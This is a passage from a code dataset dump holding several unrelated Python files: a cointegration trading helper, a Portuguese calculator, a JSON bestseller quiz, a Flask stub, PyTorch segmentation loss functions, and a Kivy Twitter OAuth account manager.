datetime\nimport matplotlib.pyplot as plt\nimport statsmodels.tsa.stattools as ts\nimport statsmodels.api as sm\nimport itertools\nimport timeit\nfrom sklearn.linear_model import LinearRegression\nfrom helpers import *\n#%%\ndef find_integrated(df, confidence=0.05):\n \"\"\"Uses ADF test to decide I(1) as in the first step of AEG test. \n Takes the data from preprocess and filters out stationary series,\n returning data in the same format. 
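# A minimal standalone sketch of the ADF screen that find_integrated() applies:
# adfuller()'s null hypothesis is a unit root, so a high p-value keeps a series
# in the "integrated" bucket. The two simulated series below are illustrative,
# not taken from the original data.
import numpy as np
import statsmodels.tsa.stattools as ts

rng = np.random.default_rng(0)
walk = np.cumsum(rng.normal(size=500))   # I(1): expect a high p-value (kept)
noise = rng.normal(size=500)             # I(0): expect a low p-value (dropped)
for name, series in [("walk", walk), ("noise", noise)]:
    pvalue = ts.adfuller(series)[1]
    print(name, round(pvalue, 4), "integrated" if pvalue >= 0.05 else "stationary")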
\n DF Test has unit root as null\"\"\"\n pairs = df.index.unique(0)\n integrated = []\n for pair in pairs:\n df.loc[pair, 'logReturns']=(np.log(df.loc[pair, 'Close'])-np.log(df.loc[pair,'Close'].shift(1))).values\n df.loc[pair, 'logClose'] = np.log(df.loc[pair, 'Close'].values)\n pvalue=ts.adfuller(df.loc[pair, 'logClose'].fillna(method='ffill').values)[1]\n if pvalue >= confidence:\n integrated.append(pair)\n return df.loc[integrated]\n\ndef cointegration(df, confidence=0.05):\n pairs = df.index.unique(0)\n cointegrated = []\n for pair in itertools.combinations(pairs,2):\n x = df.loc[pair[0], 'logClose'].fillna(method='ffill').values\n x=x.reshape((x.shape[0], 1))\n y = df.loc[pair[1], 'logClose'].fillna(method='ffill').values\n y=y.reshape((y.shape[0], 1))\n if ts.coint(x,y)[1]<= confidence:\n model = sm.OLS(y,sm.add_constant(x))\n results = model.fit()\n #the model is like \"second(logClose) - coef*first(logClose) = mean(logClose)+epsilon\" in the pair\n cointegrated.append([pair, results.params])\n return cointegrated\n\ndef coint_spread(df, viable_pairs, timeframe, betas=1):\n \"\"\"Picks out the viable pairs of the original df (which has all pairs)\n and adds to it the normPrice Spread among others, as well as initially\n defines Weights and Profit \"\"\"\n spreads = []\n if betas == 1:\n betas = [np.array([1,1]) for i in range(len(viable_pairs))]\n for pair, coefs in zip(viable_pairs, betas):\n #labels will be IOTAADA rather that IOTABTCADABTC, \n #so we remove the last three characters\n first = pair[0][:-3]\n second = pair[1][:-3]\n composed = first+'x'+second\n multiindex = pd.MultiIndex.from_product([[composed], df.loc[pair[0]].index],names = ['Pair', 'Time'])\n newdf = pd.DataFrame(index = multiindex)\n newdf['1Weights']=None\n newdf['2Weights']=None\n newdf['Profit'] = 0\n #newdf['normLogReturns']= sliced_norm (df, pair, 'logReturns', timeframe)\n newdf['1Price']=df.loc[pair[0], 'Price'].values\n newdf['2Price']=df.loc[pair[1], 'Price'].values\n newdf['1logClose']=df.loc[pair[0], 'logClose'].values\n newdf['2logClose']=df.loc[pair[1], 'logClose'].values\n newdf['Spread'] = newdf['2logClose']-newdf['1logClose']*coefs[1]\n newdf['SpreadBeta']=coefs[1]\n newdf['normSpread']=((newdf['Spread']-pick_range(newdf, *timeframe)['Spread'].mean())/pick_range(newdf, *timeframe)['Spread'].std()).values\n #not sure what those lines do\n first = df.loc[pair[0]]\n first.columns = [\"1\"+x for x in first.columns]\n second = df.loc[pair[0]]\n second.columns = [\"2\"+x for x in second.columns]\n reindexed = (pd.concat([first,second], axis=1)).set_index(multiindex)\n \n #normPriceOld = reindexed.normPrice\n #reindexed.loc[:,'normPrice'] = (reindexed.loc[:,'normPrice']-reindexed.loc[:,'normPrice'].mean())/reindexed.loc[:,'normPrice'].std()\n #possible deletion of useless columns to save memory.. \n # but maybe should be done earlier? 
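# A minimal sketch of the Engle-Granger step performed by cointegration():
# ts.coint() screens the pair, and OLS on the (log) prices gives the hedge
# ratio that coint_spread() stores as SpreadBeta. The simulated prices are
# illustrative only.
import numpy as np
import statsmodels.api as sm
import statsmodels.tsa.stattools as ts

rng = np.random.default_rng(1)
common = np.cumsum(rng.normal(size=500))            # shared stochastic trend
x = common + rng.normal(scale=0.1, size=500)
y = 0.8 * common + rng.normal(scale=0.1, size=500)
pvalue = ts.coint(x, y)[1]                          # small p-value -> cointegrated
params = sm.OLS(y, sm.add_constant(x)).fit().params # [const, hedge ratio]
spread = y - params[1] * x                          # mean-reverting if cointegrated
print("coint p-value:", round(pvalue, 4), "| hedge ratio:", round(params[1], 3))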
Only normPrice \n # should be relevant since its the spread at this point\n # reindexed.drop(['Volume', 'Close', 'Returns'], axis = 1)\n #reindexed['normPriceOld'] = normPriceOld\n spreads.append(newdf)\n return pd.concat(spreads)\n\ndef coint_profit(df, beta=1.5):\n \"\"\" Calculates the per-period profits\n Returns a Multi-Indexed one column DF with Profit\"\"\"\n \n return first-second\n#%%\n\n#%%\n\n\n#%%\n","sub_path":"cointmethod.py","file_name":"cointmethod.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343410783","text":"#Basic calculator program using Python\n#Create by Guilherme Sanches Tambelini\n#Version 1.0\n\nimport datetime\n\n#Funções Não funcionais\ndef escreveLog(texto):\n\tlog = \"C:\\\\Alpha\\\\Algoritimos\\\\Python\\\\Calculadora\\\\Log-Calculator.txt\"\n\ttry:\n\t fp = open(log)\n\texcept IOError:\n\t #Se nao existir, criar o arquivo\n\t fp = open(log, 'w+')\n\tlog = open(log, \"a\")\n\tlog.write(str(datetime.datetime.now()) + \" - \" + texto)\n\tlog.write(\"\\n\")\n\tlog.close()\n\ndef escreveTextoResultado(texto):\n\tprint(\"\\n\")\n\tprint(texto)\n\tprint(\"\\n\")\n\t\nescreveLog(\"Início\")\ncontinua = \"s\"\n\nprint(\"\\n******************* Python Calculator *******************\")\nwhile (continua == \"s\"):\n\tprint(\"\\nSelecione o número da operação desejada: \\n\")\n\tprint(\"1 - Soma\")\n\tprint(\"2 - Subtração\")\n\tprint(\"3 - Multiplicação\")\n\tprint(\"4 - Divisão\")\n\tprint(\"5 - Potencia\")\n\t\n\twhile True:\n\t\ttry:\n\t\t\tescolha = int(input(\"\\nDigite sua opção (1/2/3/4/5): \"))\n\t\t\tescreveLog(str(\"opção escolhida: \" + str(escolha))) #log\n\t\t\tbreak\n\t\texcept ValueError as e1:\n\t\t\tprint(\"\\nOpção Inválida!\")\n\t\t\tescreveLog(\"Opção Inválida!\")\n\t\t\tescreveLog(str(e1))\n\t\texcept Exception as e2:\n\t\t\tprint(\"\\nOpção Inválida!\")\n\t\t\tescreveLog(\"Opção Inválida!\")\n\t\t\tescreveLog(str(e2))\n\n\tif (escolha == 1) or (escolha == 2) or (escolha == 3) or (escolha == 4):\n\t\ttexto = input(\"\\nDigite o primeiro número: \")\n\t\ttry:\n\t\t\tnum1 = int(texto)\n\t\texcept ValueError:\n\t\t\tprint(\"\\nValor Inválido: \" + texto)\n\t\t\tcontinue\n\n\t\ttexto = input(\"\\nDigite o segundo número: \")\n\t\ttry:\n\t\t\tnum2 = int(texto)\n\t\texcept ValueError:\n\t\t\tprint(\"\\nValor Inválido: \" + texto)\n\t\t\tcontinue\n\t\n\tif (escolha == 5):\n\t\ttexto = input(\"\\nDigite a base: \")\n\t\ttry:\n\t\t\tnum1 = int(texto)\n\t\texcept ValueError:\n\t\t\tprint(\"\\nValor Inválido: \" + texto)\n\t\t\tcontinue\n\n\t\ttexto = input(\"\\nDigite o expoente: \")\n\t\ttry:\n\t\t\tnum2 = int(texto)\n\t\texcept ValueError:\n\t\t\tprint(\"\\nValor Inválido: \" + texto)\n\t\t\tcontinue\n\n\tif (escolha == 1):\n\t\tresultado = (lambda x,y: x + y) (num1, num2)\n\t\tescreveTextoResultado(str(num1) + \"+\" + str(num2) + \"=\" + str(resultado))\n\t\tescreveLog(str(num1) + \"+\" + str(num2) + \"=\" + str(resultado))\n\t\n\telif (escolha == 2):\n\t\tresultado = (lambda x,y: x - y) (num1, num2)\n\t\tescreveTextoResultado(str(num1) + \"-\" + str(num2) + \"=\" + str(resultado))\n\t\tescreveLog(str(num1) + \"-\" + str(num2) + \"=\" + str(resultado))\n\t\n\telif (escolha == 3):\n\t\tresultado = (lambda x,y: x * y) (num1, num2)\n\t\tescreveTextoResultado(str(num1) + \"*\" + str(num2) + \"=\" + str(resultado))\n\t\tescreveLog(str(num1) + \"*\" + str(num2) + \"=\" + str(resultado))\n\t\n\telif (escolha == 4):\n\t\ttry:\n\t\t\tresultado = (lambda x,y: x / 
y) (num1, num2)\n\t\t\tescreveTextoResultado(str(num1) + \"/\" + str(num2) + \"=\" + str(resultado))\n\t\t\tescreveLog(str(num1) + \"/\" + str(num2) + \"=\" + str(resultado))\n\t\texcept ZeroDivisionError as e:\n\t\t\tescreveTextoResultado(\"Divisao por zero\")\n\t\t\tescreveLog(\"Exception ZeroDivisionError:Divisao por zero - \" + str(num1) + \"/\" + str(num2))\n\t\t\tescreveLog(str(e))\n\t\n\telif (escolha == 5):\n\t\tresultado = str((lambda x,y: x ** y) (num1, num2))\n\t\tescreveTextoResultado(str(num1) + \" elevado a \" + str(num2) + \" = \" + str(resultado))\n\t\tescreveLog(str(num1) + \" elevado a \" + str(num2) + \" = \" + str(resultado))\n\telse:\n\t\tescreveTextoResultado(\"Opção Inválida!\")\n\t\tescreveLog(\"Opção Inválida: \" + str(escolha))\n\t\n\tcontinua = str(input(\"\\nDeseja continuar? Opções [s/n]: \"))\n\nelse:\n\tescreveTextoResultado(\"Fim\")\n\tescreveLog(\"Fim\")","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"309348428","text":"import requests\nimport json\ndata_url = 'http://www.compjour.org/files/code/json-examples/nyt-books-bestsellers-hardcover-fiction.json'\ndata = json.loads(requests.get(data_url).text)\nbooks = data['results']['books']\n\nscribner_books=[b for b in books if b['publisher'] == \"Scribner\"]\nprint(\"A.\", len(scribner_books))\n\ndetective_books=[b for b in books if 'detective' in b['description'].lower()]\nprint(\"B.\", len(detective_books))\n\nfrom operator import itemgetter\nx = max(books, key = itemgetter('weeks_on_list'))\ns = \"|\".join([x['title'], str(x['weeks_on_list'])])\nprint(\"C.\", s)\n\n\nx = max(books, key = itemgetter('rank_last_week'))\ns = \"|\".join([x['title'], str(x['rank']), str(x['rank_last_week'])])\nprint(\"D.\", s)\n\n\nnew_books=[b for b in books if b['rank_last_week'] == 0]\nprint(\"E.\", len(new_books))\n\n\nx = min(new_books, key = itemgetter('rank'))\ns = \"|\".join([x['title'], str(x['rank'])])\nprint(\"F.\", s)\n\n\ndef calc_rank_change(book_obj):\n return book_obj[\"rank_last_week\"] - book_obj[\"rank\"]\n\nbooks_ranked_last_week = [b for b in books if b['rank_last_week'] > 0]\nx = max(books_ranked_last_week, key = calc_rank_change)\ns = \"|\".join([x['title'], str(x['rank']), str(calc_rank_change(x))])\nprint(\"G.\", s)\n\n\nx = min(books_ranked_last_week, key = calc_rank_change)\ns = \"|\".join([x['title'], str(x['rank']), str(calc_rank_change(x))])\nprint(\"H.\", s)\n\n\nchanges = [calc_rank_change(b) for b in books_ranked_last_week]\nx = [v for v in changes if v > 0]\ns = sum(x)\nprint(\"I.\", s)\n\n\nx = [v for v in changes if v < 0]\ns = \"|\".join([str(len(x)), str(sum(x))])\nprint(\"J.\", s)\n\n\nprint('K.', max([len(b['title']) for b in books]))\n\n\nprint('L.', round(sum([len(b['title']) for b in books]) / len(books)))\n","sub_path":"json-quiz/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"305275005","text":"from immutablecollections import immutableset\n\nENGLISH_DETERMINERS = immutableset([\"the\", \"a\"])\n\"\"\"\nThese are determiners we automatically add to the beginning of non-proper English noun phrases.\nThis is a language-specific hack since learning determiners is out of our scope:\nhttps://github.com/isi-vista/adam/issues/498\n\"\"\"\nENGLISH_BLOCK_DETERMINERS = immutableset([\"you\", \"me\", \"your\", \"my\"]).union(\n 
ENGLISH_DETERMINERS\n)\n\"\"\"\nThese words block the addition of the determiners above to English noun phrases.\n\"\"\"\n","sub_path":"adam/language_specific/english/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"423973707","text":"import flask\r\n\r\napp = flask.Flask(__name__)\r\n\r\n@app.errorhandler(404)\r\ndef page_not_found(e):\r\n return flask.render_template('404.html'), 404\r\n\r\nimport views.main\r\n\r\nmain = views.main.Main.as_view('main')\r\napp.add_url_rule('/', view_func=main)\r\n\r\napp.secret_key = 'top_secret'\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513772727","text":"# -*- coding: utf-8 -*-#\n# -------------------------------------------------------------------------------\n# Name: binaray_loss\n# Description: 此文件返回loss\n# 支持 focal diceloss softdice lovaz Jacardloss\n# Author: Administrator\n# Date: 2021/5/20\n# -------------------------------------------------------------------------------\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom torch.autograd import Variable\ntry:\n from itertools import ifilterfalse\nexcept ImportError: # py3k\n from itertools import filterfalse as ifilterfalse\nimport numpy as np\n\n######################################################################\n# Focal loss\n# Copy from https://www.kaggle.com/bigironsphere/loss-function-library-keras-pytorch\n# Paper HeKaiming\n\n\nclass FocalLoss(nn.Module):\n def __init__(self, weight=None, size_average=True,ALPHA = 0.8,GAMMA = 2):\n super(FocalLoss, self).__init__()\n self.alpha = ALPHA\n self.gamma = GAMMA\n\n def forward(self, inputs, targets, Open_Sigmoid = True):\n \"\"\"\n\n :param inputs:\n :param targets:\n :param Open_Sigmoid: True: will do sigmoid in forward\n False: not do sigmoid\n :return:\n \"\"\"\n # comment out if your model contains a sigmoid or equivalent activation layer\n if Open_Sigmoid:\n inputs = torch.sigmoid(inputs)\n\n # flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n\n # first compute binary cross-entropy\n BCE = F.binary_cross_entropy(inputs, targets, reduction='mean')\n BCE_EXP = torch.exp(-BCE)\n focal_loss = self.alpha * (1 - BCE_EXP) ** self.gamma * BCE\n\n return focal_loss\n\n\n######################################################################\n# Dice loss\n# Copy from https://www.kaggle.com/bigironsphere/loss-function-library-keras-pytorch\n# This is a very common metric on biomedical use\n# PyTorch\nclass DiceLoss(nn.Module):\n def __init__(self, weight=None, size_average=True):\n super(DiceLoss, self).__init__()\n\n def forward(self, inputs, targets, smooth=1,Open_Sigmoid = True):\n # comment out if your model contains a sigmoid or equivalent activation layer\n if Open_Sigmoid:\n inputs = torch.sigmoid(inputs)\n\n # flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n\n intersection = (inputs * targets).sum()\n dice = (2. 
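# A tiny numeric check of the soft-Dice formula used by DiceLoss above,
# (2*intersection + smooth) / (inputs.sum() + targets.sum() + smooth);
# the tensors are illustrative and already lie in (0, 1), so no sigmoid here.
import torch

inputs = torch.tensor([0.9, 0.1, 0.8, 0.2])
targets = torch.tensor([1.0, 0.0, 1.0, 0.0])
smooth = 1
intersection = (inputs * targets).sum()                        # 0.9 + 0.8 = 1.7
dice = (2 * intersection + smooth) / (inputs.sum() + targets.sum() + smooth)
print(dice.item(), (1 - dice).item())                          # 4.4 / 5 = 0.88, loss 0.12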
* intersection + smooth) / (inputs.sum() + targets.sum() + smooth)\n\n return 1 - dice\n\n\n######################################################################\n# BCEDICE loss\n# Copy from https://www.kaggle.com/bigironsphere/loss-function-library-keras-pytorch\n# In somtimes: Diceloss is not stable. Often we mix dice and bce\n# PyTorch\n\nclass DiceBCELoss(nn.Module):\n def __init__(self, weight=None, size_average=True):\n super(DiceBCELoss, self).__init__()\n\n def forward(self, inputs, targets, smooth=1,Open_Sigmoid = True,alpha = 0.5):\n # comment out if your model contains a sigmoid or equivalent activation layer\n if Open_Sigmoid:\n inputs = torch.sigmoid(inputs)\n\n # flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n\n intersection = (inputs * targets).sum()\n dice_loss = 1 - (2. * intersection + smooth) / (inputs.sum() + targets.sum() + smooth)\n BCE = F.binary_cross_entropy(inputs, targets, reduction='mean')\n Dice_BCE = alpha * BCE + (1- alpha) * dice_loss\n\n return Dice_BCE\n\n\n######################################################################\n# Jaccard or ioU loss\n# Copy from https://www.kaggle.com/bigironsphere/loss-function-library-keras-pytorch\n# In somtimes: This loss is very often used in Natural Image Segmentation\n# PyTorch\n\nclass IoULoss(nn.Module):\n def __init__(self, weight=None, size_average=True):\n super(IoULoss, self).__init__()\n\n def forward(self, inputs, targets, smooth=1,Open_Sigmoid = True):\n # comment out if your model contains a sigmoid or equivalent activation layer\n if Open_Sigmoid:\n inputs = torch.sigmoid(inputs)\n\n # flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n\n # intersection is equivalent to True Positive count\n # union is the mutually inclusive area of all labels & predictions\n intersection = (inputs * targets).sum()\n total = (inputs + targets).sum()\n union = total - intersection\n\n IoU = (intersection + smooth) / (union + smooth)\n\n return 1 - IoU\n\n\n######################################################################\n# Tversky loss\n# Copy from https://www.kaggle.com/bigironsphere/loss-function-library-keras-pytorch\n# in the case of α=β=0.5 the Tversky index simplifies to be the same as\n# the Dice coefficient, which is also equal to the F1 score.\n# With α=β=1, Equation 2 produces Tanimoto coefficient,\n# and setting α+β=1 produces the set of Fβ scores.\n# Larger βs weigh recall higher than precision (by placing more emphasis on false negatives).\n# PyTorch\nALPHA = 0.5\nBETA = 0.5\n\n\nclass TverskyLoss(nn.Module):\n def __init__(self, weight=None, size_average=True):\n super(TverskyLoss, self).__init__()\n\n def forward(self, inputs, targets, smooth=1, alpha=ALPHA, beta=BETA,Open_Sigmoid = True):\n # comment out if your model contains a sigmoid or equivalent activation layer\n if Open_Sigmoid:\n inputs = torch.sigmoid(inputs)\n\n # flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n\n # True Positives, False Positives & False Negatives\n TP = (inputs * targets).sum()\n FP = ((1 - targets) * inputs).sum()\n FN = (targets * (1 - inputs)).sum()\n\n Tversky = (TP + smooth) / (TP + alpha * FP + beta * FN + smooth)\n\n return 1 - Tversky\n\n\n######################################################################\n# Lovaz Hinge loss\n# Copy from https://www.kaggle.com/bigironsphere/loss-function-library-keras-pytorch\n# for semantic segmentation, particularly for multi- class 
instances.Specifically,\n# it sorts predictions by their error before calculating cumulatively how\n# each error affects the IoU score.\n# Stolen from https://github.com/bermanmaxim/LovaszSoftmax/blob/master/pytorch/lovasz_losses.py\n# 对错误进行了基于Pytorch的修正 理论上应该没有问题,但是实际使用可能会在反向传播时失效\nclass LovaszBinarayLoss(nn.Module):\n def __init__(self):\n super(LovaszBinarayLoss, self).__init__()\n\n def forward(self,logits,labels,per_image=True, ignore=None):\n \"\"\"\n Binary Lovasz hinge loss\n logits: [B, H, W] Variable, logits at each pixel (between -\\infty and +\\infty)\n labels: [B, H, W] Tensor, binary ground truth masks (0 or 1)\n per_image: compute the loss per image instead of per batch\n ignore: void class id\n \"\"\"\n if per_image:\n loss = LovaszBinarayLoss.mean(self.lovasz_hinge_flat(*self.flatten_binary_scores(log.unsqueeze(0), lab.unsqueeze(0), ignore))\n for log, lab in zip(logits, labels))\n else:\n loss = self.lovasz_hinge_flat(*self.flatten_binary_scores(logits, labels, ignore))\n return loss\n\n # --------------------------- BINARY LOSSES ---------------------------\n\n def lovasz_hinge_flat(self,logits, labels):\n \"\"\"\n Binary Lovasz hinge loss\n logits: [P] Variable, logits at each prediction (between -\\infty and +\\infty)\n labels: [P] Tensor, binary ground truth labels (0 or 1)\n ignore: label to ignore\n \"\"\"\n if len(labels) == 0:\n # only void pixels, the gradients should be 0\n return logits.sum() * 0.\n signs = 2. * labels.float() - 1.\n errors = (1. - logits * Variable(signs))\n errors_sorted, perm = torch.sort(errors, dim=0, descending=True)\n perm = perm.data\n gt_sorted = labels[perm]\n grad = self.lovasz_grad(gt_sorted)\n loss = torch.dot(F.relu(errors_sorted), Variable(grad))\n return loss\n\n def flatten_binary_scores(self,scores, labels, ignore=None):\n \"\"\"\n Flattens predictions in the batch (binary case)\n Remove labels equal to 'ignore'\n \"\"\"\n scores = scores.view(-1)\n labels = labels.view(-1)\n if ignore is None:\n return scores, labels\n valid = (labels != ignore)\n vscores = scores[valid]\n vlabels = labels[valid]\n return vscores, vlabels\n\n # --------------------------- HELPER FUNCTIONS ---------------------------\n @staticmethod\n def lovasz_grad(gt_sorted):\n \"\"\"\n Computes gradient of the Lovasz extension w.r.t sorted errors\n See Alg. 1 in paper\n \"\"\"\n p = len(gt_sorted)\n gts = gt_sorted.sum()\n intersection = gts - gt_sorted.float().cumsum(0)\n union = gts + (1 - gt_sorted).float().cumsum(0)\n jaccard = 1. 
- intersection / union\n if p > 1: # cover 1-pixel case\n jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]\n return jaccard\n\n @staticmethod\n def isnan(x):\n return x != x\n\n @staticmethod\n def mean(l, ignore_nan=False, empty=0):\n \"\"\"\n nanmean compatible with generators.\n \"\"\"\n l = iter(l)\n if ignore_nan:\n l = ifilterfalse(LovaszBinarayLoss.isnan, l)\n try:\n n = 1\n acc = next(l)\n except StopIteration:\n if empty == 'raise':\n raise ValueError('Empty mean')\n return empty\n for n, v in enumerate(l, 2):\n acc += v\n if n == 1:\n return acc\n return acc / n\n\n\ndef check_all_losses_run():\n label = torch.ones(size=[2, 1, 3, 4]) # 假设有一个 3*4 的全1 的label标记\n logits_1 = torch.randn(size=[2, 1, 3, 4], requires_grad=True) # 假设网络输出的结果为二分类的 logits值\n logits_2 = logits_1 - 0.1\n logits_3 = logits_1 + 0.1\n # 测试 loss是否正确给定\n dicebce = DiceBCELoss()\n diceloss = DiceLoss()\n focalloss = FocalLoss()\n iouloss = IoULoss()\n lovazbinar = LovaszBinarayLoss()\n terverskay = TverskyLoss()\n\n\n loss_1 = dicebce(logits_1, label)\n loss_2 = dicebce(logits_2, label)\n loss_3 = dicebce(logits_3, label)\n print(\"dicebce:\", loss_1, loss_2, loss_3)\n\n loss_1 = diceloss(logits_1, label)\n loss_2 = diceloss(logits_2, label)\n loss_3 = diceloss(logits_3, label)\n print(\"diceloss:\", loss_1, loss_2, loss_3)\n\n loss_1 = focalloss(logits_1, label)\n loss_2 = focalloss(logits_2, label)\n loss_3 = focalloss(logits_3, label)\n print(\"focalloss:\", loss_1, loss_2, loss_3)\n\n loss_1 = iouloss(logits_1, label)\n loss_2 = iouloss(logits_2, label)\n loss_3 = iouloss(logits_3, label)\n print(\"iouloss:\", loss_1, loss_2, loss_3)\n\n loss_1 = lovazbinar(logits_1, label)\n loss_2 = lovazbinar(logits_2, label)\n loss_3 = lovazbinar(logits_3, label)\n print(\"lovazbinar:\", loss_1, loss_2, loss_3)\n\n loss_1 = terverskay(logits_1, label)\n loss_2 = terverskay(logits_2, label)\n loss_3 = terverskay(logits_3, label)\n print(\"terverskay:\", loss_1, loss_2, loss_3)\n\n\n\nif __name__ == '__main__':\n check_all_losses_run()\n\n\n","sub_path":"src/toolbox/loss_box/binaray_loss.py","file_name":"binaray_loss.py","file_ext":"py","file_size_in_byte":11612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"288057263","text":"# coding:utf-8\nfrom __future__ import print_function\nimport oauth2 \nimport sys\nimport sqlite3\nimport twitter\nimport urllib\nimport webbrowser as web\nimport ast\nfrom contextlib import closing\nfrom contextlib import contextmanager\nfrom kivy.app import App\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.properties import ObjectProperty\nfrom kivy.config import Config\nfrom kivy.uix.button import Button\nimport configparser\nfrom kivy.core.window import Window\n\nConfig.set('input', 'mouse', 'mouse,disable_multitouch') \nconfig = configparser.ConfigParser()\nconfig.read('setting.ini')\n\ndef load_app_keys():\n return config['APPKEY']['CONSUMER_KEY'], config['APPKEY']['CONSUMER_SECRET']\n\ndef load_access_tokens():\n return config['ACCOUNT']['SELECTED_ACCESS_TOKEN_KEY'], config['ACCOUNT']['SELECTED_ACCESS_TOKEN_SECRET']\n \nclass SelectAccountScreen(BoxLayout, Screen):\n dbname = 'Account.db'\n infomation = ObjectProperty(None)\n account = ObjectProperty(None)\n ACS = ''\n\n def get_sql_data(self, search_sql, 
account_id):\n with closing(sqlite3.connect(dbname)) as conn:\n c = conn.cursor()\n search_sql = search_sql + '\"' + account_id + '\"';\n cur = c.execute(search_sql)\n ret = str(cur.fetchall())\n a = ret.split(\"'\")\n conn.close()\n return a[1]\n\n def get_access_token_key(self, account_id):\n search_sql = 'select oauth_token from users where screen_name='\n return self.get_sql_data(search_sql, account_id)\n \n def get_access_token_secret(self, account_id):\n search_sql = 'select oauth_token_secret from users where screen_name='\n return self.get_sql_data(search_sql, account_id)\n\n def set_account(self):\n try:\n print(\"Enter your Account ID : \", end=\"\")\n print(self.account.text)\n account_id = self.account.text\n #print(account_id)\n account_hit = False\n access_token_key = ''\n access_token_secret = ''\n #print(\"AAAA\")\n\n with closing(sqlite3.connect(dbname)) as conn:\n c = conn.cursor()\n search_sql = 'select * from users where screen_name='\n search_sql = search_sql + '\"' + account_id + '\"';\n cur = c.execute(search_sql)\n # if len(cur.fetchall()):\n account_hit = True\n access_token_key = self.get_access_token_key(account_id)\n access_token_secret = self.get_access_token_secret(account_id)\n # else:\n # account_hit = False\n conn.close()\n\n # if (account_hit == False):\n # print(\"Sorry, but the account is not registered\")\n # sys.exit()\n #print(\"AAAA\")\n\n section1 = 'ACCOUNT'\n config.set(section1, 'SELECTED_ACCOUNT_ID', account_id)\n config.set(section1, 'SELECTED_ACCESS_TOKEN_KEY', access_token_key)\n config.set(section1, 'SELECTED_ACCESS_TOKEN_SECRET', access_token_secret)\n with open('setting.ini', 'w') as file:\n config.write(file)\n \n #print(\"AAAA\")\n CK, CS = load_app_keys()\n ATK, ATS = load_access_tokens()\n #print(CK)\n api = twitter.Api(consumer_key=CK,\n consumer_secret=CS,\n access_token_key=ATK,\n access_token_secret=ATS\n )\n\n #api.PostUpdate(\"set Account\")\n self.infomation.text = account_id + \" is selected.\"\n except IndexError:\n print(\"IndexError\")\n self.infomation.text = \"The account is not registered.\"\n except KeyError:\n print(\"KeyError\")\n except ValueError:\n print(\"ValueError\")\n except NameError:\n print(\"NameError\")\n\nclass RegistAccountScreen(BoxLayout, Screen):\n oauth_data = ''\n number = ObjectProperty(None)\n #message = ObjectProperty(None)\n def get_request_token(self):\n CK, CS = load_app_keys()\n consumer = oauth2.Consumer(key=CK, secret=CS)\n client = oauth2.Client(consumer)\n response, content = client.request(\"https://api.twitter.com/oauth/request_token\", \"GET\")\n content = (content.decode())\n oauth_data = dict(urllib.parse.parse_qsl(content))\n # ex. oauth_data =\n # {'oauth_token_secret': 'Number and Alphabet',\n # 'oauth_token': 'Number and Alphabet',\n # 'oauth_callback_confirmed': 'true or false'}\n return oauth_data\n \n def get_access_token(self, oauth_token, oauth_verifier):\n CK, CS = load_app_keys()\n consumer = oauth2.Consumer(key=CK, secret=CS)\n token = oauth2.Token(oauth_token, oauth_verifier)\n client = oauth2.Client(consumer, token)\n response, content = client.request(\"https://api.twitter.com/oauth/access_token\", \"POST\", body=\"oauth_verifier={0}\".format(oauth_verifier))\n content = (content.decode())\n oauth_data = dict(urllib.parse.parse_qsl(content))\n # ex. 
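# The string-concatenated SQL in get_sql_data()/set_account() above works, but
# sqlite3 also accepts "?" placeholders, which avoids quoting bugs and SQL
# injection. get_tokens() is a hypothetical helper shown only for comparison.
import sqlite3
from contextlib import closing

def get_tokens(dbname, account_id):
    with closing(sqlite3.connect(dbname)) as conn:
        cur = conn.cursor()
        cur.execute("select oauth_token, oauth_token_secret from users where screen_name=?",
                    (account_id,))
        row = cur.fetchone()
    return row  # None when the account is not registered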
oauth_data =\n # {'oauth_token_secret': 'Number and Alphabet',\n # 'user_id': 'Number',\n # 'x_auth_expires': 'Number',\n # 'oauth_token': 'Number-Number and Alphabet',\n # 'screen_name': 'Account ID'}\n return oauth_data\n \n def setup_account(self):\n oauth = self.get_request_token()\n #oauth_data = ast.literal_eval(oauth_data)\n # self.message.text=\"a\"\n # print(self.message.text)\n #print(oauth)\n url = \"https://api.twitter.com/oauth/authorize?oauth_token=\" + oauth['oauth_token']\n browser = web.get('\"/usr/bin/chromium-browser\" %s')\n browser.open(url)\n global oauth_data\n oauth_data = oauth\n \n def enter_pin(self):\n # PIN input\n try:\n global oauth_data\n print(\"Enter your PIN code : \")\n print(self.number.text)\n #oauth_verifier = input()\n oauth_verifier = self.number.text\n \n # parameter settings\n oauth_token = oauth_data['oauth_token']\n oauth_token_secret = oauth_data['oauth_token_secret'] \n oauth_data = self.get_access_token(oauth_token, oauth_verifier)\n\n # register account to DB \n dbname = 'Account.db'\n with closing(sqlite3.connect(dbname)) as conn:\n c = conn.cursor()\n search_sql = 'select * from users where screen_name='\n search_sql = search_sql + '\"' + oauth_data['screen_name'] + '\"'; \n #print(search_sql)\n cur = c.execute(search_sql)\n if 